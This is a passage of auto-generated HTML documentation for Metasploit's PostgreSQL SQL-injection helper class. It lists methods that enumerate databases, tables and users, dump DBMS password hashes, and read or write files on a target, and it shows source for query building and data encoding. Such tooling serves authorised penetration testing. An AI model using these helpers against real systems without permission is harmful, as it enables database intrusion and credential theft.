adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c3f5bd3de2d1affa01e2f6c2066c6bb0fc6413bc
metasploit-gs/api/Msf/Exploit/SQLi/PostgreSQLi/Common.html
T

1576 lines
78 KiB
HTML
Raw Normal View History

Reboot gh-pages
2026-05-08 17:08:43 +00:00
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Class: Msf::Exploit::SQLi::PostgreSQLi::Common
&mdash; Documentation by YARD 0.9.37
</title>
<link rel="stylesheet" href="../../../../css/style.css" type="text/css" />
<link rel="stylesheet" href="../../../../css/common.css" type="text/css" />
<script type="text/javascript">
pathId = "Msf::Exploit::SQLi::PostgreSQLi::Common";
relpath = '../../../../';
</script>
<script type="text/javascript" charset="utf-8" src="../../../../js/jquery.js"></script>
<script type="text/javascript" charset="utf-8" src="../../../../js/app.js"></script>
</head>
<body>
<div class="nav_wrap">
<iframe id="nav" src="../../../../class_list.html?1"></iframe>
<div id="resizer"></div>
</div>
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../../../_index.html">Index (C)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../SQLi.html" title="Msf::Exploit::SQLi (module)">SQLi</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../PostgreSQLi.html" title="Msf::Exploit::SQLi::PostgreSQLi (module)">PostgreSQLi</a></span></span>
&raquo;
<span class="title">Common</span>
</div>
<div id="search">
<a class="full_list_link" id="class_list_link"
href="../../../../class_list.html">
<svg width="24" height="24">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>
<div class="clear"></div>
</div>
<div id="content"><h1>Class: Msf::Exploit::SQLi::PostgreSQLi::Common
</h1>
<div class="box_info">
<dl>
<dt>Inherits:</dt>
<dd>
<span class="inheritName"><span class='object_link'><a href="../Common.html" title="Msf::Exploit::SQLi::Common (class)">Common</a></span></span>
<ul class="fullTree">
<li>Object</li>
<li class="next"><span class='object_link'><a href="../Common.html" title="Msf::Exploit::SQLi::Common (class)">Common</a></span></li>
<li class="next">Msf::Exploit::SQLi::PostgreSQLi::Common</li>
</ul>
<a href="#" class="inheritanceTree">show all</a>
</dd>
</dl>
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/exploit/sqli/postgresqli/common.rb</dd>
</dl>
</div>
<div id="subclasses">
<h2>Direct Known Subclasses</h2>
<p class="children"><span class='object_link'><a href="BooleanBasedBlind.html" title="Msf::Exploit::SQLi::PostgreSQLi::BooleanBasedBlind (class)">BooleanBasedBlind</a></span>, <span class='object_link'><a href="TimeBasedBlind.html" title="Msf::Exploit::SQLi::PostgreSQLi::TimeBasedBlind (class)">TimeBasedBlind</a></span></p>
</div>
<h2>
Constant Summary
<small><a href="#" class="constants_summary_toggle">collapse</a></small>
</h2>
<dl class="constants">
<dt id="ENCODERS-constant" class="">ENCODERS =
<div class="docstring">
<div class="discussion">
<p>Encoders supported by PostgreSQL Keys are function names, values are decoding procs in Ruby</p>
</div>
</div>
<div class="tags">
</div>
</dt>
<dd><pre class="code"><span class='lbrace'>{</span>
<span class='label'>base64:</span> <span class='lbrace'>{</span>
<span class='label'>encode:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>translate(encode(^DATA^::bytea, \&#39;base64\&#39;), E\&#39;\n\&#39;,\&#39;\&#39;)</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='label'>decode:</span> <span class='id identifier rubyid_proc'>proc</span> <span class='lbrace'>{</span> <span class='op'>|</span><span class='id identifier rubyid_data'>data</span><span class='op'>|</span> <span class='const'>Base64</span><span class='period'>.</span><span class='id identifier rubyid_decode64'>decode64</span><span class='lparen'>(</span><span class='id identifier rubyid_data'>data</span><span class='rparen'>)</span> <span class='rbrace'>}</span>
<span class='rbrace'>}</span><span class='comma'>,</span>
<span class='label'>hex:</span> <span class='lbrace'>{</span>
<span class='label'>encode:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>encode(^DATA^::bytea, \&#39;hex\&#39;)</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='label'>decode:</span> <span class='id identifier rubyid_proc'>proc</span> <span class='lbrace'>{</span> <span class='op'>|</span><span class='id identifier rubyid_data'>data</span><span class='op'>|</span> <span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_hex_to_raw'>hex_to_raw</span><span class='lparen'>(</span><span class='id identifier rubyid_data'>data</span><span class='rparen'>)</span> <span class='rbrace'>}</span>
<span class='rbrace'>}</span>
<span class='rbrace'>}</span><span class='period'>.</span><span class='id identifier rubyid_freeze'>freeze</span></pre></dd>
<dt id="BIT_COUNTS-constant" class="">BIT_COUNTS =
</dt>
<dd><pre class="code"><span class='lbrace'>{</span> <span class='int'>0</span> <span class='op'>=&gt;</span> <span class='int'>0</span><span class='comma'>,</span> <span class='int'>0b1</span> <span class='op'>=&gt;</span> <span class='int'>1</span><span class='comma'>,</span> <span class='int'>0b11</span> <span class='op'>=&gt;</span> <span class='int'>2</span><span class='comma'>,</span> <span class='int'>0b111</span> <span class='op'>=&gt;</span> <span class='int'>3</span><span class='comma'>,</span> <span class='int'>0b1111</span> <span class='op'>=&gt;</span> <span class='int'>4</span><span class='comma'>,</span> <span class='int'>0b11111</span> <span class='op'>=&gt;</span> <span class='int'>5</span><span class='comma'>,</span> <span class='int'>0b111111</span> <span class='op'>=&gt;</span> <span class='int'>6</span><span class='comma'>,</span> <span class='int'>0b1111111</span> <span class='op'>=&gt;</span> <span class='int'>7</span><span class='comma'>,</span> <span class='int'>0b11111111</span> <span class='op'>=&gt;</span> <span class='int'>8</span> <span class='rbrace'>}</span><span class='period'>.</span><span class='id identifier rubyid_freeze'>freeze</span></pre></dd>
</dl>
<h2>Instance Attribute Summary</h2>
<h3 class="inherited">Attributes inherited from <span class='object_link'><a href="../Common.html" title="Msf::Exploit::SQLi::Common (class)">Common</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../Common.html#concat_separator-instance_method" title="Msf::Exploit::SQLi::Common#concat_separator (method)">#concat_separator</a></span>, <span class='object_link'><a href="../Common.html#datastore-instance_method" title="Msf::Exploit::SQLi::Common#datastore (method)">#datastore</a></span>, <span class='object_link'><a href="../Common.html#framework-instance_method" title="Msf::Exploit::SQLi::Common#framework (method)">#framework</a></span>, <span class='object_link'><a href="../Common.html#null_replacement-instance_method" title="Msf::Exploit::SQLi::Common#null_replacement (method)">#null_replacement</a></span>, <span class='object_link'><a href="../Common.html#safe-instance_method" title="Msf::Exploit::SQLi::Common#safe (method)">#safe</a></span>, <span class='object_link'><a href="../Common.html#second_concat_separator-instance_method" title="Msf::Exploit::SQLi::Common#second_concat_separator (method)">#second_concat_separator</a></span>, <span class='object_link'><a href="../Common.html#truncation_length-instance_method" title="Msf::Exploit::SQLi::Common#truncation_length (method)">#truncation_length</a></span></p>
<h3 class="inherited">Attributes included from <span class='object_link'><a href="../../../../Rex/Ui/Subscriber/Input.html" title="Rex::Ui::Subscriber::Input (module)">Rex::Ui::Subscriber::Input</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../../Rex/Ui/Subscriber/Input.html#user_input-instance_method" title="Rex::Ui::Subscriber::Input#user_input (method)">#user_input</a></span></p>
<h3 class="inherited">Attributes included from <span class='object_link'><a href="../../../../Rex/Ui/Subscriber/Output.html" title="Rex::Ui::Subscriber::Output (module)">Rex::Ui::Subscriber::Output</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../../Rex/Ui/Subscriber/Output.html#user_output-instance_method" title="Rex::Ui::Subscriber::Output#user_output (method)">#user_output</a></span></p>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#current_database-instance_method" title="#current_database (instance method)">#<strong>current_database</strong> &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Query the current database name.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#current_user-instance_method" title="#current_user (instance method)">#<strong>current_user</strong> &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Query the current user.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#dump_table_fields-instance_method" title="#dump_table_fields (instance method)">#<strong>dump_table_fields</strong>(table, columns, condition = &#39;&#39;, num_limit = 0) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Query the given columns of the records of the given table, that satisfy an optional condition @param table [String] The name of the table to query @param columns [Array] The names of the columns to query @param condition [String] An optional condition, return only the rows satisfying it @param num_limit [Integer] An optional maximum number of results to return @return [Array] An array, where each element is an array of strings representing a row of the results.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#enum_database_names-instance_method" title="#enum_database_names (instance method)">#<strong>enum_database_names</strong> &#x21d2; Array </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Query the names of all the existing databases.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#enum_dbms_users-instance_method" title="#enum_dbms_users (instance method)">#<strong>enum_dbms_users</strong> &#x21d2; Array </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Query the PostgreSQL users (their username and password), this might require elevated privileges.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#enum_table_columns-instance_method" title="#enum_table_columns (instance method)">#<strong>enum_table_columns</strong>(table_name) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Query the column names of the given table in the given database @param table_name [String] the name of the table of which you want to query the column names @return [Array] An array of Strings, the column names in the given table belonging to the given database.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#enum_table_names-instance_method" title="#enum_table_names (instance method)">#<strong>enum_table_names</strong>(database = &#39;public&#39;) &#x21d2; Array </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Query the names of the tables in a given database.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#enum_view_names-instance_method" title="#enum_view_names (instance method)">#<strong>enum_view_names</strong>(database = &#39;public&#39;) &#x21d2; Array </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Query the names of the views in the given database.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#initialize-instance_method" title="#initialize (instance method)">#<strong>initialize</strong>(datastore, framework, user_output, opts = {}, &amp;query_proc) &#x21d2; Common </a>
</span>
<span class="note title constructor">constructor</span>
<span class="summary_desc"><div class='inline'>
<p>See SQLi::Common#initialize.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#read_from_file-instance_method" title="#read_from_file (instance method)">#<strong>read_from_file</strong>(fpath, binary = false) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Attempt reading from a file on the filesystem  @return [String] The content of the file if reading was successful.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#test_vulnerable-instance_method" title="#test_vulnerable (instance method)">#<strong>test_vulnerable</strong> &#x21d2; Boolean </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Checks if the SQL injection is working, by checking that queries that should return known results return the results we expect from them.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#version-instance_method" title="#version (instance method)">#<strong>version</strong> &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Query the PostgreSQL version @return [String] The PostgreSQL version in use.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#write_to_file-instance_method" title="#write_to_file (instance method)">#<strong>write_to_file</strong>(fname, data) &#x21d2; void </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Writes data to a file on the target system.</p>
</div></span>
</li>
</ul>
<h3 class="inherited">Methods inherited from <span class='object_link'><a href="../Common.html" title="Msf::Exploit::SQLi::Common (class)">Common</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../Common.html#raw_run_sql-instance_method" title="Msf::Exploit::SQLi::Common#raw_run_sql (method)">#raw_run_sql</a></span>, <span class='object_link'><a href="../Common.html#run_sql-instance_method" title="Msf::Exploit::SQLi::Common#run_sql (method)">#run_sql</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../Module/UI.html" title="Msf::Module::UI (module)">Module::UI</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../Module/UI.html#init_ui-instance_method" title="Msf::Module::UI#init_ui (method)">#init_ui</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../Module/UI/Message.html" title="Msf::Module::UI::Message (module)">Module::UI::Message</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../Module/UI/Message.html#print_error-instance_method" title="Msf::Module::UI::Message#print_error (method)">#print_error</a></span>, <span class='object_link'><a href="../../../Module/UI/Message.html#print_good-instance_method" title="Msf::Module::UI::Message#print_good (method)">#print_good</a></span>, <span class='object_link'><a href="../../../Module/UI/Message.html#print_prefix-instance_method" title="Msf::Module::UI::Message#print_prefix (method)">#print_prefix</a></span>, <span class='object_link'><a href="../../../Module/UI/Message.html#print_status-instance_method" title="Msf::Module::UI::Message#print_status (method)">#print_status</a></span>, <span class='object_link'><a href="../../../Module/UI/Message.html#print_warning-instance_method" title="Msf::Module::UI::Message#print_warning (method)">#print_warning</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../Module/UI/Message/Verbose.html" title="Msf::Module::UI::Message::Verbose (module)">Module::UI::Message::Verbose</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../Module/UI/Message/Verbose.html#vprint_error-instance_method" title="Msf::Module::UI::Message::Verbose#vprint_error (method)">#vprint_error</a></span>, <span class='object_link'><a href="../../../Module/UI/Message/Verbose.html#vprint_good-instance_method" title="Msf::Module::UI::Message::Verbose#vprint_good (method)">#vprint_good</a></span>, <span class='object_link'><a href="../../../Module/UI/Message/Verbose.html#vprint_status-instance_method" title="Msf::Module::UI::Message::Verbose#vprint_status (method)">#vprint_status</a></span>, <span class='object_link'><a href="../../../Module/UI/Message/Verbose.html#vprint_warning-instance_method" title="Msf::Module::UI::Message::Verbose#vprint_warning (method)">#vprint_warning</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../Module/UI/Line.html" title="Msf::Module::UI::Line (module)">Module::UI::Line</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../Module/UI/Line.html#print_line-instance_method" title="Msf::Module::UI::Line#print_line (method)">#print_line</a></span>, <span class='object_link'><a href="../../../Module/UI/Line.html#print_line_prefix-instance_method" title="Msf::Module::UI::Line#print_line_prefix (method)">#print_line_prefix</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../Module/UI/Line/Verbose.html" title="Msf::Module::UI::Line::Verbose (module)">Module::UI::Line::Verbose</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../Module/UI/Line/Verbose.html#vprint_line-instance_method" title="Msf::Module::UI::Line::Verbose#vprint_line (method)">#vprint_line</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../../Rex/Ui/Subscriber.html" title="Rex::Ui::Subscriber (module)">Rex::Ui::Subscriber</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../../Rex/Ui/Subscriber.html#copy_ui-instance_method" title="Rex::Ui::Subscriber#copy_ui (method)">#copy_ui</a></span>, <span class='object_link'><a href="../../../../Rex/Ui/Subscriber.html#init_ui-instance_method" title="Rex::Ui::Subscriber#init_ui (method)">#init_ui</a></span>, <span class='object_link'><a href="../../../../Rex/Ui/Subscriber.html#reset_ui-instance_method" title="Rex::Ui::Subscriber#reset_ui (method)">#reset_ui</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../../Rex/Ui/Subscriber/Input.html" title="Rex::Ui::Subscriber::Input (module)">Rex::Ui::Subscriber::Input</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../../Rex/Ui/Subscriber/Input.html#gets-instance_method" title="Rex::Ui::Subscriber::Input#gets (method)">#gets</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../../Rex/Ui/Subscriber/Output.html" title="Rex::Ui::Subscriber::Output (module)">Rex::Ui::Subscriber::Output</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../../Rex/Ui/Subscriber/Output.html#flush-instance_method" title="Rex::Ui::Subscriber::Output#flush (method)">#flush</a></span>, <span class='object_link'><a href="../../../../Rex/Ui/Subscriber/Output.html#print-instance_method" title="Rex::Ui::Subscriber::Output#print (method)">#print</a></span>, <span class='object_link'><a href="../../../../Rex/Ui/Subscriber/Output.html#print_blank_line-instance_method" title="Rex::Ui::Subscriber::Output#print_blank_line (method)">#print_blank_line</a></span>, <span class='object_link'><a href="../../../../Rex/Ui/Subscriber/Output.html#print_error-instance_method" title="Rex::Ui::Subscriber::Output#print_error (method)">#print_error</a></span>, <span class='object_link'><a href="../../../../Rex/Ui/Subscriber/Output.html#print_good-instance_method" title="Rex::Ui::Subscriber::Output#print_good (method)">#print_good</a></span>, <span class='object_link'><a href="../../../../Rex/Ui/Subscriber/Output.html#print_line-instance_method" title="Rex::Ui::Subscriber::Output#print_line (method)">#print_line</a></span>, <span class='object_link'><a href="../../../../Rex/Ui/Subscriber/Output.html#print_status-instance_method" title="Rex::Ui::Subscriber::Output#print_status (method)">#print_status</a></span>, <span class='object_link'><a href="../../../../Rex/Ui/Subscriber/Output.html#print_warning-instance_method" title="Rex::Ui::Subscriber::Output#print_warning (method)">#print_warning</a></span></p>
<div id="constructor_details" class="method_details_list">
<h2>Constructor Details</h2>
<div class="method_details first">
<h3 class="signature first" id="initialize-instance_method">
#<strong>initialize</strong>(datastore, framework, user_output, opts = {}, &amp;query_proc) &#x21d2; <tt><span class='object_link'><a href="" title="Msf::Exploit::SQLi::PostgreSQLi::Common (class)">Common</a></span></tt>
</h3><div class="docstring">
<div class="discussion">
<p>See SQLi::Common#initialize</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
29
30
31
32
33
34
35
36
37</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/sqli/postgresqli/common.rb', line 29</span>
<span class='kw'>def</span> <span class='id identifier rubyid_initialize'>initialize</span><span class='lparen'>(</span><span class='id identifier rubyid_datastore'>datastore</span><span class='comma'>,</span> <span class='id identifier rubyid_framework'>framework</span><span class='comma'>,</span> <span class='id identifier rubyid_user_output'>user_output</span><span class='comma'>,</span> <span class='id identifier rubyid_opts'>opts</span> <span class='op'>=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span><span class='comma'>,</span> <span class='op'>&amp;</span><span class='id identifier rubyid_query_proc'>query_proc</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='symbol'>:encoder</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_is_a?'>is_a?</span><span class='lparen'>(</span><span class='const'>String</span><span class='rparen'>)</span> <span class='op'>||</span> <span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='symbol'>:encoder</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_is_a?'>is_a?</span><span class='lparen'>(</span><span class='const'>Symbol</span><span class='rparen'>)</span>
<span class='comment'># if it&#39;s a String or a Symbol, use a predefined encoder if it exists
</span> <span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='symbol'>:encoder</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='symbol'>:encoder</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_downcase'>downcase</span><span class='period'>.</span><span class='id identifier rubyid_intern'>intern</span>
<span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='symbol'>:encoder</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="#ENCODERS-constant" title="Msf::Exploit::SQLi::PostgreSQLi::Common::ENCODERS (constant)">ENCODERS</a></span></span><span class='lbracket'>[</span><span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='symbol'>:encoder</span><span class='rbracket'>]</span><span class='rbracket'>]</span> <span class='kw'>if</span> <span class='const'><span class='object_link'><a href="#ENCODERS-constant" title="Msf::Exploit::SQLi::PostgreSQLi::Common::ENCODERS (constant)">ENCODERS</a></span></span><span class='lbracket'>[</span><span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='symbol'>:encoder</span><span class='rbracket'>]</span><span class='rbracket'>]</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='symbol'>:concat_separator</span><span class='rbracket'>]</span> <span class='op'>||=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>,</span><span class='tstring_end'>&#39;</span></span>
<span class='kw'>super</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<h3 class="signature first" id="current_database-instance_method">
#<strong>current_database</strong> &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Query the current database name</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The name of the current database</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
51
52
53</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/sqli/postgresqli/common.rb', line 51</span>
<span class='kw'>def</span> <span class='id identifier rubyid_current_database'>current_database</span>
<span class='id identifier rubyid_call_function'>call_function</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>current_database()</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="current_user-instance_method">
#<strong>current_user</strong> &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Query the current user</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The username of the current user</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
59
60
61</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/sqli/postgresqli/common.rb', line 59</span>
<span class='kw'>def</span> <span class='id identifier rubyid_current_user'>current_user</span>
<span class='id identifier rubyid_call_function'>call_function</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>getpgusername()</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="dump_table_fields-instance_method">
#<strong>dump_table_fields</strong>(table, columns, condition = &#39;&#39;, num_limit = 0) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Query the given columns of the records of the given table, that satisfy an optional condition</p>
<pre class="code ruby"><code class="ruby">@param table [String] The name of the table to query
@param columns [Array] The names of the columns to query
@param condition [String] An optional condition, return only the rows satisfying it
@param num_limit [Integer] An optional maximum number of results to return
@return [Array] An array, where each element is an array of strings representing a row of the results
</code></pre>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/sqli/postgresqli/common.rb', line 123</span>
<span class='kw'>def</span> <span class='id identifier rubyid_dump_table_fields'>dump_table_fields</span><span class='lparen'>(</span><span class='id identifier rubyid_table'>table</span><span class='comma'>,</span> <span class='id identifier rubyid_columns'>columns</span><span class='comma'>,</span> <span class='id identifier rubyid_condition'>condition</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_num_limit'>num_limit</span> <span class='op'>=</span> <span class='int'>0</span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span> <span class='kw'>if</span> <span class='id identifier rubyid_columns'>columns</span><span class='period'>.</span><span class='id identifier rubyid_empty?'>empty?</span>
<span class='id identifier rubyid_one_column'>one_column</span> <span class='op'>=</span> <span class='id identifier rubyid_columns'>columns</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span> <span class='op'>==</span> <span class='int'>1</span>
<span class='kw'>if</span> <span class='id identifier rubyid_one_column'>one_column</span>
<span class='id identifier rubyid_columns'>columns</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>coalesce(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_columns'>columns</span><span class='period'>.</span><span class='id identifier rubyid_first'>first</span><span class='embexpr_end'>}</span><span class='tstring_content'>::text,&#39;</span><span class='embexpr_beg'>#{</span><span class='ivar'>@null_replacement</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;)</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_columns'>columns</span> <span class='op'>=</span> <span class='ivar'>@encoder</span><span class='lbracket'>[</span><span class='symbol'>:encode</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_sub'>sub</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>^DATA^</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_columns'>columns</span><span class='rparen'>)</span> <span class='kw'>if</span> <span class='ivar'>@encoder</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_columns'>columns</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>concat_ws(&#39;</span><span class='embexpr_beg'>#{</span><span class='ivar'>@second_concat_separator</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;,</span><span class='tstring_end'>&quot;</span></span> <span class='op'>+</span> <span class='id identifier rubyid_columns'>columns</span><span class='period'>.</span><span class='id identifier rubyid_map'>map</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_col'>col</span><span class='op'>|</span>
<span class='id identifier rubyid_col'>col</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>coalesce(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_col'>col</span><span class='embexpr_end'>}</span><span class='tstring_content'>::text,&#39;</span><span class='embexpr_beg'>#{</span><span class='ivar'>@null_replacement</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;)</span><span class='tstring_end'>&quot;</span></span>
<span class='ivar'>@encoder</span> <span class='op'>?</span> <span class='ivar'>@encoder</span><span class='lbracket'>[</span><span class='symbol'>:encode</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_sub'>sub</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>^DATA^</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_col'>col</span><span class='rparen'>)</span> <span class='op'>:</span> <span class='id identifier rubyid_col'>col</span>
<span class='kw'>end</span><span class='period'>.</span><span class='id identifier rubyid_join'><span class='object_link'><a href="../../../../top-level-namespace.html#join-instance_method" title="#join (method)">join</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>,</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span> <span class='op'>+</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>)</span><span class='tstring_end'>&#39;</span></span>
<span class='kw'>end</span>
<span class='kw'>unless</span> <span class='id identifier rubyid_condition'>condition</span><span class='period'>.</span><span class='id identifier rubyid_empty?'>empty?</span>
<span class='id identifier rubyid_condition'>condition</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'> where </span><span class='tstring_end'>&#39;</span></span> <span class='op'>+</span> <span class='id identifier rubyid_condition'>condition</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_num_limit'>num_limit</span> <span class='op'>=</span> <span class='id identifier rubyid_num_limit'>num_limit</span><span class='period'>.</span><span class='id identifier rubyid_to_i'>to_i</span>
